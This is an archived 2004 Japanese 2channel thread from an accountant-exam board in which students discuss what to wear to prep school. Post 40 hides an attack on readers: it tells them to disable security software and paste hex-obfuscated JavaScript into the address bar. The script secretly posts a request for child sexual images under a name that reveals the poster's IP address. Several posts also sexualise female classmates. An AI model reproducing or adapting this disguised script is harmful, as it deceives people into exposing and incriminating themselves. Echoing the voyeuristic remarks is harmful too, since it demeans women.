5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

予備校に行くときのファッション

1 :一般に公正妥当と認められた名無しさん:04/09/28 22:43:46 ID:???
どうもねー毎日朝から夜までだいたい同じメンバーで
かといって喋るわけでもなく、ただただ自習している仲でも
自分を含めて周りの人のファッションが気になるわけよ

2 :一般に公正妥当と認められた名無しさん:04/09/28 22:45:16 ID:???
毎日Tシャツにジーパン。
最近やっとTシャツの袖が長くなった

3 :一般に公正妥当と認められた名無しさん:04/09/28 22:49:10 ID:???
毎日ジャージ。

4 :一般に公正妥当と認められた名無しさん:04/09/28 22:59:56 ID:tNJHPuC6
毎日スーツ!これ最強ネクタイやシャツかえるだけでよい

5 :一般に公正妥当と認められた名無しさん:04/09/28 23:04:00 ID:???
俺はいつも斜め前に座っている女の子の下着が気になる。

6 :一般に公正妥当と認められた名無しさん:04/09/28 23:05:06 ID:qaWSpn5p
女の子がミニスカだとついパンツの色想像したり
スカートたくし上げて太ももなでたいだとか考えちゃう

>>4
いいなそれ やってんだ
俺もやってみようかな

7 :一般に公正妥当と認められた名無しさん:04/09/28 23:06:40 ID:???
全身アンダーカバー

8 :一般に公正妥当と認められた名無しさん:04/09/28 23:09:21 ID:???
板違い。

ファッション
http://life5.2ch.net/fashion/


9 :一般に公正妥当と認められた名無しさん:04/09/29 00:43:25 ID:???
まぁこれが板違いなら、飲み物スレも昼飯スレも削除代行依頼してから、これの削除代行依頼しろよ。
ルールがダブルスタンダードなら、だれも信用はしない罠。

予備校に行くときのファッションは↓のスレと同等の性質だろうよ。
受験生の昼ごはん@水道橋
http://school4.2ch.net/test/read.cgi/exam/1074977150/l50
学校で勉強のお供の飲み物は?
http://school4.2ch.net/test/read.cgi/exam/1075642506/l50

>>8が自治スレに貼ってる削除人の申した判断基準からして、こう思うけどな。



10 :一般に公正妥当と認められた名無しさん:04/09/29 00:56:18 ID:???
>>9
その2つのスレッドは既に一度削除依頼に出されて保留になってる。
削除整理板のぞいてみ。

11 :一般に公正妥当と認められた名無しさん:04/09/29 01:04:15 ID:???
>>10

上は出て様子見されているな。
下は出ていないけれど、嘘ですか?(ニヤニヤ

削除依頼してないのに削除依頼済みと言ったりすることも多いしね〜。


調べたらばれる嘘をついてもいいことなんか一つもないのにね。





12 :一般に公正妥当と認められた名無しさん:04/09/29 06:32:42 ID:???
>>11
あいつら頭悪いから適当に流そうぜ!

13 :一般に公正妥当と認められた名無しさん:04/09/29 06:46:13 ID:???
自治厨って、自治スレと削除依頼にしか書き込みしてなさそうでキモイ。

14 :一般に公正妥当と認められた名無しさん:04/09/29 06:57:22 ID:ZpkmC67z
いやそんなこといいから服の話しようや

15 :一般に公正妥当と認められた名無しさん:04/09/29 08:49:55 ID:llGjPcU2
俺はアメカジ

16 :一般に公正妥当と認められた名無しさん:04/09/29 08:51:43 ID:???
ユニT着て言ったら同じのを着た香具師と隣同士になって
その場からダッシュで逃げ去りたい衝動に駆られたorz

17 :一般に公正妥当と認められた名無しさん:04/09/29 09:18:03 ID:???
>>16

ユニクロTシャツって、でぶいオサーンがおんなじの着てたりするときがあるからなぁ・・・。
もうね、人間としてオhルんじゃないか、と自分が情けなくなる。

18 :一般に公正妥当と認められた名無しさん:04/09/29 09:48:43 ID:???
ユニTと今までの遺産だけで夏を過ごしたぞ

19 :一般に公正妥当と認められた名無しさん:04/09/29 12:42:37 ID:PeWyQbqq
そろそろ衣替えだな。
もれは寒さのぎりぎりまではんそででつ

20 :一般に公正妥当と認められた名無しさん:04/09/29 13:38:42 ID:yMIcwem7
>5

というか、前に座ってる女の子パンツなんて
ほとんど見えない??

ズボンできてる子とかならだいたい後ろから見えるけどな。
この前、授業中に黒のパンツが見えてハアハアしたことがある

21 :一般に公正妥当と認められた名無しさん:04/09/29 14:41:14 ID:ZpkmC67z
あれみっともなくねえ?
ズボンからパンツはみでてるなんて
俺のクラスなんて働いてる女の子とか
振替でたまたま休日授業一緒になったとき
休日なのに普段の出勤する格好で来てた

22 :一般に公正妥当と認められた名無しさん:04/09/29 15:05:44 ID:dGAqIcWh
全身ディオールでキメッキメの受験生ってのも嫌だな・・
やっぱ楽な格好が1番だよ。あと自習室が暑かったり寒かったりするから
体温調節しやすい格好。靴は脱ぎやすいスニーカーで。
冬場とかに便所サンダルの人とかいるが(ロッカーに入れてるのか?)
あれも快適な自習環境を追及した結果なんだろうな。やり過ぎ感も否めないが

23 :一般に公正妥当と認められた名無しさん:04/09/29 15:11:39 ID:???
Diorだろうが便所スリッパだろうが迷惑かけないなら全く問題ない。
まあ前者のほうが女にはもてるだろうな。顔が同じ場合な。

24 :一般に公正妥当と認められた名無しさん:04/09/29 15:21:52 ID:???
まぁ黒でまとめればいいんじゃない?

25 :一般に公正妥当と認められた名無しさん:04/09/29 15:24:09 ID:???
貧弱な体したやつが黒でまとめてもな・・・

26 :一般に公正妥当と認められた名無しさん:04/09/29 15:33:12 ID:???
デブはそれ以下だよな。何着ても。
ディオール最高!って奴でジーンズしか持ってないやつダサダサw

27 :カリビアンコム:04/09/29 15:36:12 ID:???
黒でまとめるってお前らのセンスだと単に黒い服ばっか着てるだけだろ

それは黒でまとめてるんじゃなくて黒い服ばっかり着ているってことだよ!

28 :一般に公正妥当と認められた名無しさん:04/09/29 15:38:48 ID:ZpkmC67z
女の子って大体どういうカッコしてるのかな?
みんな地味なせいかあんま印象にのこんない
下はジーパンが殆どだと思うけど
上は・・・・・どうなんだろ?

29 :一般に公正妥当と認められた名無しさん:04/09/29 15:41:19 ID:???
この時期はノーブラ

30 :一般に公正妥当と認められた名無しさん:04/09/29 15:41:35 ID:???
背が低い奴も損だよな。170以下とかで体を大きく見せようとして
スケーター系やサイズ大きめで着てるのは可哀想ですよ。あと普通の眼鏡

31 :一般に公正妥当と認められた名無しさん:04/09/29 15:41:55 ID:???
>>26
新宿港では柄付のジーンズがはやってるらしいよ

32 :一般に公正妥当と認められた名無しさん:04/09/29 15:44:07 ID:???
たかが専門に着ていく服なんてどうでもいいと考える人は間違っています
高い服である必要はないが、小奇麗にしておく癖をつけないと社会に出る前に
困る



33 :一般に公正妥当と認められた名無しさん:04/09/29 15:54:35 ID:???
講義聞いて自習の間にたまに喋るだけなのに
オシャレする必要性はない

34 :一般に公正妥当と認められた名無しさん:04/09/29 15:58:33 ID:ZpkmC67z
いやでも学校帰りとか会社帰りの人とかは当然オシャレするでしょ

35 :一般に公正妥当と認められた名無しさん:04/09/29 17:27:33 ID:???
おしゃれというか、最低限の身だしなみは必要かと。

36 :一般に公正妥当と認められた名無しさん:04/09/29 17:40:26 ID:???
だらしない格好だと気持ちも引き締まらないでしょう?


37 :一般に公正妥当と認められた名無しさん:04/09/29 19:24:38 ID:???
ポールスミ男

38 :一般に公正妥当と認められた名無しさん:04/09/29 19:25:48 ID:???
常にギャルソン

39 :一般に公正妥当と認められた名無しさん:04/09/29 21:52:55 ID:???
http://66.102.7.104/search?q=cache:krnqvU2yMbYJ:greatsearch.biz/+&hl=ja&inlang=ja


40 :一般に公正妥当と認められた名無しさん:04/09/29 22:40:47 ID:???
(準備)
2ch専用ブラウザを使用している人は、
IEなどの一般的なブラウザでこのスレを開いておく。
また、Norton等のセキュリティソフトはオフにしておいたほうがいい。

1、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

2、
改行を外して1行にする。

3、
1行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。

4、
Enterを押す(もしくは「移動」をクリックする)。

(正直、2ch初心者はやらないほうがいい。ある程度、
 酸いも甘いもかみ分けたぐらいのベテラン2chねらーじゃないと
 対処できない事態に陥るかもしれないからだ。
 しかし、PCが壊れたりグロ画像が表示されたりということは
 絶対にないので、その辺は安心していてよい。
 ちょっとした、びっくり箱みたいな仕掛けが発動するだけだ)


41 :一般に公正妥当と認められた名無しさん:04/09/29 22:43:52 ID:???
>>35
まぁその最低限の身だしなみすらできていない奴が多いけどな。

42 :一般に公正妥当と認められた名無しさん:04/09/29 22:49:16 ID:???
>>41
身なりに気を遣ってるから、万年受験生になるんだろ。

43 :一般に公正妥当と認められた名無しさん:04/09/29 23:17:51 ID:???
だから、「最低限の」身なりだ。

44 :一般に公正妥当と認められた名無しさん:04/09/29 23:19:06 ID:???
ってかなんでユニクロTとかきるの?
受験生だしオシャレばっかってのもなんだけど
ユクロTですごしましたってのはないだろー
電車とか乗るわけだし大学もいくだろ?

俺友達がユニクロTだったらちょっといやだなぁ

45 :一般に公正妥当と認められた名無しさん:04/09/29 23:26:39 ID:adlyyVAM
ww ウケル!

46 :一般に公正妥当と認められた名無しさん:04/09/30 00:14:07 ID:gdvArVse
安いから
これに尽きる


47 :一般に公正妥当と認められた名無しさん:04/09/30 01:07:55 ID:???
小奇麗=おしゃれだと勘違いしてるやつは・・・

48 :一般に公正妥当と認められた名無しさん:04/09/30 02:51:52 ID:???
お前ら、服装で悩むなよ。勉強に集中しなさい。

それに、毎日服を替えることのできない人もいる。

来期から、TACも制服制になっちゃうよ。

49 :一般に公正妥当と認められた名無しさん:04/09/30 05:22:48 ID:96al6rh+
専門で勉強するのにユニクロ馬鹿にしてる奴は人間として駄目だな
センスないな

実際知り合いにそんな奴がいたら
「お前、そんなにおしゃれじゃないよ」って一蹴してやりたいな

そんなチャラヤンは俺のドリスでアングロマニアしてやりたいな

50 :一般に公正妥当と認められた名無しさん:04/09/30 07:50:45 ID:???
何でも良いヤン服なんて。

51 :一般に公正妥当と認められた名無しさん:04/09/30 07:53:32 ID:???
ユニTのサイズ表示のシールを剥がすの忘れたまま
TACに行って友だちに指摘された俺は神!

52 :一般に公正妥当と認められた名無しさん:04/09/30 07:57:31 ID:???
>>48
女子にはセーラー服キボンヌ

53 :一般に公正妥当と認められた名無しさん:04/09/30 08:00:05 ID:???
ユニ黒良いよ、俺好きだし、カッコイイ俺は何を着ても似合うよ。

54 :一般に公正妥当と認められた名無しさん:04/09/30 08:20:37 ID:???
なんでこんなにユニクロが人気なの?
ほんとうにカッコイイと思ってるのか??

>>ユニクロ馬鹿にしてる奴は人間として駄目だな センスないな

これとか完全にネタだろ?

お前らもてないだろ?
男はルックスと服とオーラとおもしろいかで価値が決まる
お前ら痛すぎ
カッコイイやつでユニクロ着てるヤツなんてみたことない!

せめてイッセイミヤケ、ズッカ、ギャルソン、ヨウジヤマモトくらいの
ミーハーブランドでも着こなしてるヤツいないのか??

予備校でいまどき全身B×Hとかいたけど
ユニクロTよりかはいたくない


55 :一般に公正妥当と認められた名無しさん:04/09/30 08:24:28 ID:???
俺着ているって、絶対お前よりカッコイイよ。

56 :一般に公正妥当と認められた名無しさん:04/09/30 08:25:22 ID:gdvArVse
いやだから安いからだって
これだけだよ
かっこいい云々より単に安いから着てる
これ以外にありえない

57 :一般に公正妥当と認められた名無しさん:04/09/30 09:00:13 ID:???
>せめてイッセイミヤケ、ズッカ、ギャルソン、ヨウジヤマモトくらいの
>ミーハーブランドでも着こなしてるヤツいないのか??

こういう生活してる学生や無職でそういうブランド着てるのは正直どうかと・・
バイトしまくりで給料の大半を服に費やす服オタ学生ならわかるけど
予備校通ってるんだからその可能性は無いに等しいだろうし。
親が金持ちで好きな服買える家庭環境なら別に文句言わないけどなぁ。

スネかじりのくせに浪費する後ろめたさから漏れは知り合いに会う可能性の無い日はユニで済ましてる。
電車は5分くらいしか乗らないから車内で知らない人に見られても(・ε・)キニシナイ!!

合コンとか飲み会等、人に会う時はそれなりに気を遣うけどね。

58 :一般に公正妥当と認められた名無しさん:04/09/30 09:24:12 ID:i90Tfeot
やっぱユニクロもいいけどダイエーだよ

59 :一般に公正妥当と認められた名無しさん:04/09/30 09:24:17 ID:???
USバソバソの服しか着ませんが何か?

60 :一般に公正妥当と認められた名無しさん:04/09/30 09:24:58 ID:i90Tfeot
でたー USバンバン

61 :一般に公正妥当と認められた名無しさん:04/09/30 09:27:53 ID:???
USバソバソ以外僕には目に入らないよ。

62 :一般に公正妥当と認められた名無しさん:04/09/30 09:32:57 ID:???
しまむら最強

63 :一般に公正妥当と認められた名無しさん:04/09/30 10:12:30 ID:???
usバンバンなぁ。
上下そろえて500円で買えちゃうことがあるもんな。

64 :一般に公正妥当と認められた名無しさん:04/09/30 10:19:07 ID:???
>>54
大爆笑
イタすぎやなオマエ

65 :一般に公正妥当と認められた名無しさん:04/09/30 10:23:42 ID:???
ドメスティックブランドには興味ない。かっこいい服はたくさんあるんだけどねー

66 :一般に公正妥当と認められた名無しさん:04/09/30 10:32:57 ID:???
zuccaなら2,3年前の着てるけど

67 :一般に公正妥当と認められた名無しさん:04/09/30 15:18:25 ID:???
関西弁やめろ

68 :一般に公正妥当と認められた名無しさん:04/09/30 16:23:09 ID:p9o6LtrG
服のこととかやめてくれよー、気にしてタック行けなくなるやんけ。
俺もユニクロばっかし着てる。ユニクロだったらまだましな方で、
天満の駅前とかにハンガーに掛けられて1着300〜500円位のTシャツ
とか着てる時が多い。

でも、俺も背高いし顔も男前やで、実際そんなカッコでもナンパできるし

69 :一般に公正妥当と認められた名無しさん:04/09/30 16:24:34 ID:???
>>67
エエヤン、何怒っているの??

70 :一般に公正妥当と認められた名無しさん:04/09/30 16:28:49 ID:???
かっこいいかっこしたくても、金ないからな。

就活のときもリクスーを調達するのに困った。

71 :一般に公正妥当と認められた名無しさん:04/09/30 16:37:45 ID:gdvArVse
そんなおれ等の味方がユニクロ!!!!!!!
でもそんな服装なんか気にしなくてもえーやろ
俺なんか汚くたってクラスの子仲良くなれたで
携帯とメーアドも聞いたし
ただ料金かかるからあんま長電話できないといってたけど

72 :一般に公正妥当と認められた名無しさん:04/09/30 16:41:00 ID:???
>ただ料金かかるからあんま長電話できないといってたけど

(T・T)

73 :一般に公正妥当と認められた名無しさん:04/09/30 16:44:00 ID:???
あのー、いつも同じシャツの男性がいるんです。シマシマの。
シャツ自体は別になんてことないんですが、私の記憶では
週に4日学校で見かけてるんだけど、違う服着てるの見たことがない。
近くに寄ったことないからニオイはわからないけど、そんなに
不潔っぽい感じはしません。でも、毎日同じシャツにファブリーズ
とかだったらイヤン。
全く同じシャツをたくさん持っているか、私の記憶違いであることを
祈っています。


74 :一般に公正妥当と認められた名無しさん:04/09/30 17:03:00 ID:???
近くによったことがないんだったら、いいじゃないですか。

75 :一般に公正妥当と認められた名無しさん:04/09/30 17:19:19 ID:???
正直お洒落とか良く分からない、ラフな格好している。

76 :一般に公正妥当と認められた名無しさん:04/09/30 17:52:11 ID:???
じゃ、点が論ハットでもかぶって古き西洋を気取るか

77 :一般に公正妥当と認められた名無しさん:04/09/30 18:01:34 ID:???
>>76
むしろゴルフの・・・・・の真似になるんじゃないか?
なんだっけ、名前出てこないや。

78 :一般に公正妥当と認められた名無しさん:04/09/30 19:22:48 ID:???
尾崎?丸山?

79 :一般に公正妥当と認められた名無しさん:04/09/30 19:33:51 ID:???
俺のジーパン臭い。5年間ほとんど毎日はいてるし。

80 :一般に公正妥当と認められた名無しさん:04/09/30 21:01:29 ID:???
>>79
良い色落ちしてますか?

81 :一般に公正妥当と認められた名無しさん:04/09/30 23:04:53 ID:oPqj406g
もれは夏ピコですごしたYO

82 :一般に公正妥当と認められた名無しさん:04/09/30 23:07:24 ID:???
>>68
天満の駅前かぁ。なかなかやるな。

83 :一般に公正妥当と認められた名無しさん:04/09/30 23:22:39 ID:???

>>81
Picoってまだ流行ってるブランドじゃないノか?
Tシャツだけならそうでもないのかな。

84 :一般に公正妥当と認められた名無しさん:04/09/30 23:23:26 ID:???
>>78

片山だろ、グリーンでハッスルハッスルってやってるやつ。

85 :一般に公正妥当と認められた名無しさん:04/10/01 02:53:21 ID:k9S05HBL
まー自分がお洒落好きなのはいいけどお洒落じゃない人を否定しちゃ駄目だな

お洒落さん同士で、「お前そのトリッカーズ見飽きたよ、何年目だよ?」とか言って
「あ?高1」っていうナイーブな会話がタイシノブクニなわけで
お洒落さんがデブキモオタに「お前なんだよそのピコ」って言ってるのは
まーせいぜいPPFMぐらいかな

予備校?大学受験ですか?
っていうか全身B×Hと全身ユニクロだったら
明らかに後者の方がかっけーゼ

それとこれだけはマジで言わせてくれ
ギャルソンやヨージはお前なんかがミーハーって呼べるレベルじゃねーぞ
お前はその2つのブランドがどれだけ日本の服飾に影響を与えたのか知ってるのか?
丸井が最先端のお洒落スポットだったときから丸井が厨房の巣窟になった今日まで
日本のファッション水準を世界レベルに引き上げ
常に業界のトップを歩いてる2人だぞ

お前が多少いい服きて回り見下して「男はなー」なんて語れるのも、
くだらねー女と夜の後tb作成出来るのも
彼らの才能に何分の一かは起因すんだよ
ズッカなんかと格が違うんだよ、ファックオフ!


86 :一般に公正妥当と認められた名無しさん:04/10/01 02:55:21 ID:???
なんでもええやん。

87 :一般に公正妥当と認められた名無しさん:04/10/01 03:09:15 ID:???
ZUCCA>>>>YOJI>COM>>>壁>>>ユニ>PPFM

88 :一般に公正妥当と認められた名無しさん:04/10/01 08:41:38 ID:???
なんか会計士板なのにやたらファッションに必死なヤシがいるな・・・
ズッカだのギャルソンだのそんなの買う金あるか??受講生に
青山とか随分いってないなぁ。予備校通い始めてはや1年!
俺にはそんな金も時間も無い。
おれの偏見だが、予備校に全身ギャルソンなんてみたことないし
いたとしても受からんだろ?オシャレに気を使うよりもいまは
もっと優先させなきゃならんモノがあるだろ・・・

俺も今は結構ヒドイ格好だよ。アクセスの日は起きたら家ソッコーでるから
服えらぶとかない。予備校で会う知り合い少数だし。
毎日キャップかハットかぶってる。整髪量とかめったにつけないな・・・
週1回大学行くときくらいだな

まぁ結論として予備校でオシャレは場違い。空気よめてない
冬なのに黒いギャル男と同じ

89 :一般に公正妥当と認められた名無しさん:04/10/01 08:54:33 ID:W5DpU6uD
女の子ってみなスタイルいいけど地味だね
やっぱ会計士の女の子は暗いよ・・・・・・
クラスでも彼氏いる子とかいたけど
地味な服装で控えめだね

90 :一般に公正妥当と認められた名無しさん:04/10/01 09:47:27 ID:GOhoz7C0
ギャルソンやY'sの服はラグタグで買ってるよー。安いしたまに掘り出し物あるし。


91 :一般に公正妥当と認められた名無しさん:04/10/01 10:36:03 ID:xtPh6F9R
はでなふく 欲しい

92 :一般に公正妥当と認められた名無しさん:04/10/01 11:01:04 ID:???
朝っぱらからアクセス出てるのに
化粧ばっちりの女には尊敬する。
何時に起きてるねんって感じ

93 :一般に公正妥当と認められた名無しさん:04/10/01 11:40:39 ID:???
>>90
なつかしい!よく行ったな〜。ギャルソンはたくさん置いてある店だったな。
でもギャルソンなんて1つも持ってないや。
>>88
毎日かぶってると禿げるぞーい

94 :一般に公正妥当と認められた名無しさん:04/10/01 12:50:26 ID:???
オシャレもせず試験にも受からずオヤジになっていく。。。

95 :一般に公正妥当と認められた名無しさん:04/10/01 13:35:13 ID:Gwz0P0xX
穴開いたジーパンってはやってる?大原にいますた!

96 :一般に公正妥当と認められた名無しさん:04/10/01 13:56:38 ID:???
はやってない。

97 :一般に公正妥当と認められた名無しさん:04/10/01 16:40:02 ID:???
古着じゃだめか?

98 :一般に公正妥当と認められた名無しさん:04/10/01 21:15:23 ID:NeqpUCtz
>>95
水道橋の上級の茶髪のやつだなw

パーマのほう?ストレートのほう?

99 :一般に公正妥当と認められた名無しさん:04/10/01 21:47:43 ID:NeqpUCtz
どっちもでしたよ

100 :一般に公正妥当と認められた名無しさん:04/10/01 21:48:43 ID:???
100

101 :一般に公正妥当と認められた名無しさん:04/10/02 01:20:09 ID:???
101

102 :一般に公正妥当と認められた名無しさん:04/10/02 01:22:20 ID:???
102

103 :一般に公正妥当と認められた名無しさん:04/10/02 09:21:47 ID:???
ラグタグブランド物安く置いてあるけど結構しくってるヤツおおくない?
掘り出し物をさがす感じだよね
渋谷のまえユニクロがあったとこにできたね、吉祥寺にもできたね
ラグタグ最近はばをきかせてるけどPXが最高なのは間違いない

ってゆうか予備校とか会計士に女を求めるものなのか?そんなこと考える前に勉強だろ?
可愛い子はわざわざガリガリ勉強とかそんな努力しなくても幸せになれるんだから
可愛くてガリ勉なんて菊川怜くらいだろ、あれは奇跡だな。
すくなくとも俺の周りには可愛くて頭いいなんていない。それは自分でもわかってるだろ?


104 :一般に公正妥当と認められた名無しさん:04/10/02 13:08:57 ID:mEO6B6FZ
けど勉強仲間が出来ればそれに越したことは無い
一人でやるのと二人でやるのとではまるで違う

105 :一般に公正妥当と認められた名無しさん:04/10/02 22:08:04 ID:???
細身の巨乳女子高生がいい!

106 :一般に公正妥当と認められた名無しさん:04/10/03 17:14:12 ID:???
キモヲタ系ヴェテの禿げと同じユニクロTだった、ショック。
もうユニクロ着ません

107 :一般に公正妥当と認められた名無しさん:04/10/03 19:24:51 ID:???
どこの学校だよ キモオタってw

108 :一般に公正妥当と認められた名無しさん:04/10/03 20:33:59 ID:???
http://maichy.s1.x-beat.com/up/data/oo5961.zip
P=にせモナッ!


109 :一般に公正妥当と認められた名無しさん:04/10/04 23:56:00 ID:zzgj+nkO
やっぱり109でしょ!

110 :一般に公正妥当と認められた名無しさん:04/10/05 05:42:59 ID:5OWnSRo4
渋谷の?

111 :一般に公正妥当と認められた名無しさん:04/10/06 08:41:28 ID:A1CeGM9j
秋葉の!

112 :一般に公正妥当と認められた名無しさん:04/10/08 00:24:21 ID:???
やっぱり、でっかいリュック背負ってヤドカリファッションだな
水道橋そんな奴ばっかだよ
そんなこといってる俺もそうだが・・・・

113 :一般に公正妥当と認められた名無しさん:04/10/08 00:24:44 ID:???
リュック背負って猫背だろ

114 :一般に公正妥当と認められた名無しさん:04/10/08 00:26:21 ID:???
ヴェテ欄になるほど、かばんは小さくなるよ。

115 :一般に公正妥当と認められた名無しさん:04/10/08 00:27:34 ID:???
>>113
紙袋(キャラもの)を持ったら最恐だな。

116 :一般に公正妥当と認められた名無しさん:04/10/08 00:27:55 ID:???
ファッションセンスは100%磨かれないね。
吹き溜まりの集まりだから。

117 :TAC:04/10/09 00:16:09 ID:vobtVhu8
かっこよい人は何を着てもかっこいい
一番さむいのは、キモイ人が高い、ブランドとかの服を着てるの。
ぶよぶよの体にアルマーニとかグッチとかきても無意味。
人が服を選ぶのではなく、服が人をえらぶのです。

個人的好みからいえば、
似合わないギャルソン、YOJI等<<ユニクロ、無印をカッコよく着こなせる子

そして、TACにもおしゃれな人はたくさんいる。と思う。
おしゃれな人以外はOUT OF 視界だからかもしれないが。。
外見で人を判断するなという前に、自分の内面(趣味、興味)とかこういう風に見られたいって言うのを
外見、服装でアピールできる人になって欲しいね。
実は性格や趣味、興味はファッションに如実に表れるよ。と、思うよ。 

118 :一般に公正妥当と認められた名無しさん:04/10/09 00:28:14 ID:???
>人が服を選ぶのではなく、服が人をえらぶのです

殿様商売だな。

119 :一般に公正妥当と認められた名無しさん:04/10/09 01:49:22 ID:???
>>117
そんなお前もOUT OF 視界

120 :一般に公正妥当と認められた名無しさん:04/10/09 01:54:30 ID:???
みんなユニクロとかギャルソンとかってレベル高すぎない?
ブランドもんなんてみんな100円のTシャツにブランドの
ロゴをつけて10000円で売ってる詐欺商売だよ、こんなのに
だまされる人が会計士とかやってけると思ってんの?
食料品買うついでにダイエーの衣料品でオールインワンだ!以上。



121 :一般に公正妥当と認められた名無しさん:04/10/09 01:57:59 ID:???
まあ身だしなみがきちんとしてれば別に何でもいいんじゃないか?
だがセンスもねえのに高い服着てる奴は間違いなく周りから馬鹿にされてるぞ。

122 :一般に公正妥当と認められた名無しさん:04/10/09 02:08:00 ID:???
俺のことだ・・・

123 :一般に公正妥当と認められた名無しさん:04/10/09 02:37:24 ID:???
とりあえずビィトンバッグ持ってるやつおわっとるでよ
あとナンバーナイン

124 :一般に公正妥当と認められた名無しさん:04/10/09 05:37:19 ID:???
凶のファッションは、カッパ。

125 :一般に公正妥当と認められた名無しさん:04/10/09 10:34:01 ID:???
ダイエーの衣料品はさすがにきついだろ
ギャルソンだのズッカだの
ブランドにこだわる必要はないと思うけど
やっぱファッションは気にかけたほうがいいと思うなぁ
あんましダサいとやだよ。ファッションはオーラを出すものだと思う。
カッコイイヤツは何きても似合うとかいうやつがいるけど
カッコイイ奴で服しくってるやついないだろ?カッコイイ奴はおしゃれ多い。

まぁそもそも予備校におしゃれしてくる必要ないと思うけどな
受験生だし。そんなのよりも優先させることが・・・
受かって遊ぶときとかどっか行くときおしゃれすればいい

126 :一般に公正妥当と認められた名無しさん:04/10/09 15:50:51 ID:lo4H89jF
でもやっぱさあクラスに可愛い子とかいると
注目されたくて無意識にオシャレしちゃうんだよね・・・・・
俺はやらんけど

127 :一般に公正妥当と認められた名無しさん:04/10/09 15:55:45 ID:???
>>126 そんな純粋ボーイいる?

128 :一般に公正妥当と認められた名無しさん:04/10/09 16:15:23 ID:???
>>120はギャルソンの服を着たことがないのか?
タグだけの安物かどうか手にとって見ておいで。


129 :一般に公正妥当と認められた名無しさん:04/10/09 16:26:13 ID:???
かっこいいやつがダイエーの衣料品着てたよ
ばっちり似合ってた

130 :一般に公正妥当と認められた名無しさん:04/10/09 16:31:33 ID:???
,j;;;;;j,. ---一、 `  ―--‐、_ l;;;;;;
 {;;;;;;ゝ T辷iフ i    f'辷jァ  !i;;;;; 
  ヾ;;;ハ    ノ       .::!lリ;;r゙   さすがに大学を卒業するまでには童貞を捨てているだろう・・・
   `Z;i   〈.,_..,.      ノ;;;;;;;;>  そんなふうに考えていた時期が
   ,;ぇハ、 、_,.ー-、_',.    ,f゙: Y;;f     俺にもありました
   ~''戈ヽ   `二´    r'´:::. `!


131 :TAC:04/10/09 17:52:01 ID:vobtVhu8
ダイエーでもなんでもよいが、
やはり重要なのは着方。
おしゃれ=気合入れて服を選びキメキメにする
ってことでは、ないと思うのね。
むしろそういうのは引く。
ジーンズにTシャツ、起き抜けに何も考えずに着てきましたって感じの人
アクセスとかに多いけど、
着方が分かってる人は、ばっちりスタイリッシュ。
むしろその力が抜けた感がかっこいい雰囲気。
特に男の子は、
顔はあんま関係ない気がする。
顔そこそこでもおしゃれな人はすごくかっこ良く見える。
雰囲気でしょ、やっぱ。
125じゃないけど、大事なのはオーラなんだよ。
だから、俺はどうせかっこよくないし
なんていってあきらめてないで、126みたく頑張って欲しい。
じゃなきゃ受かったからってモテないでしょ。
確かに一番大事なのは勉強だけど、
おしゃれって楽しいじゃん?
そのくらいのささやかな楽しみは許されるんじゃないの
学校いくのも楽しくなるよ、きっと。
台風でヒマだったので、持論をぶってしまいました。
ごめんね!


132 :一般に公正妥当と認められた名無しさん:04/10/09 18:00:56 ID:???
いや、君におおむね同意だ!

133 :一般に公正妥当と認められた名無しさん:04/10/09 18:04:44 ID:???
ファッションより身長が重要

134 :一般に公正妥当と認められた名無しさん:04/10/09 18:07:49 ID:???
身長より体重だとおもう。

背がでかくても、ふとっていればかっこ悪い

135 :一般に公正妥当と認められた名無しさん:04/10/09 18:11:02 ID:nwRe0kQ4
>>125と >>131
に同意!!

(゚з゚)イインデネーノ?


136 :一般に公正妥当と認められた名無しさん:04/10/09 18:11:42 ID:???
背が高くても、たんそく&腕が短いとみっともないな。

137 :一般に公正妥当と認められた名無しさん:04/10/09 18:15:09 ID:nwRe0kQ4
おしゃれって、かっこいい奴をみてかっこいいと思えることから始まる、と思う。雑誌でも日常でも、また予備校でもまあそれなりにかっこいい奴っているじゃん?

「俺もああなりたい」と思うことから、自分もかっこよくなるんでないかい?



138 :TAC:04/10/09 20:49:51 ID:vobtVhu8
137いいこと言うな〜!
まさに。
そう思ってると、おしゃれさんにはつい目が行ってしまう。
おしゃれ上手はおしゃれ泥棒ダナ



139 :一般に公正妥当と認められた名無しさん:04/10/09 20:55:39 ID:???
女にしか目がいかねぇ

140 :一般に公正妥当と認められた名無しさん:04/10/09 21:02:34 ID:???
俺は胸に目が行ってしまうorz

141 :青木さやか:04/10/09 21:04:38 ID:AhBPeOwd
どこ見てんのよ!!!!!

142 :長井秀和:04/10/09 21:11:54 ID:???
よく青木さやかはどこみてんのよっていうが、

おまえの胸なんか誰もみねーよ!

ただの自意識過剰なだけだ!!まちがいない

143 :一般に公正妥当と認められた名無しさん:04/10/09 21:13:01 ID:???
ユニクロは低価格をやめるらしいよ

今日のWBSみろや

144 :一般に公正妥当と認められた名無しさん:04/10/09 21:53:54 ID:???
ずいぶん古い話をひきだすな

145 :一般に公正妥当と認められた名無しさん:04/10/09 23:40:24 ID:???
最近、青木さやかがかわいいと思い始めるようになった。

146 :一般に公正妥当と認められた名無しさん:04/10/09 23:52:21 ID:???
長井も青木も本当は性格いいと思うぞ。びびる大木とかぐっさんみてえなのが
案外腹黒い。

147 :一般に公正妥当と認められた名無しさん:04/10/10 00:37:45 ID:???
ぐっさんがまだ地方芸人(相方いなくなったね)だった頃、収録を見に行ったよ。

生放送だったけど、CM中とかモノ真似したり観客に話し掛けてくれてめちゃ大ファンになった。

ちなみに磯野貴理子もいたが、かなりキレイでびっくりしました。

148 :一般に公正妥当と認められた名無しさん:04/10/10 00:55:20 ID:???
ぐっさんに相方なんていたっけ?
ビートきよしみたいな存在の人?

149 :一般に公正妥当と認められた名無しさん:04/10/10 01:57:50 ID:???
今や誰も知らないがdon-doko-donというお笑いコンビだった。

その頃からぐっさんだけ光っていたが

150 :一般に公正妥当と認められた名無しさん:04/10/10 10:45:48 ID:???
会計士板みてると女に必死な奴が多いけど
予備校に女を求めるものなのか・・・?
予備校の美人率なんて合格率より低いと思う
大学がいいよ。大学はばかが多いけど美人覆い。
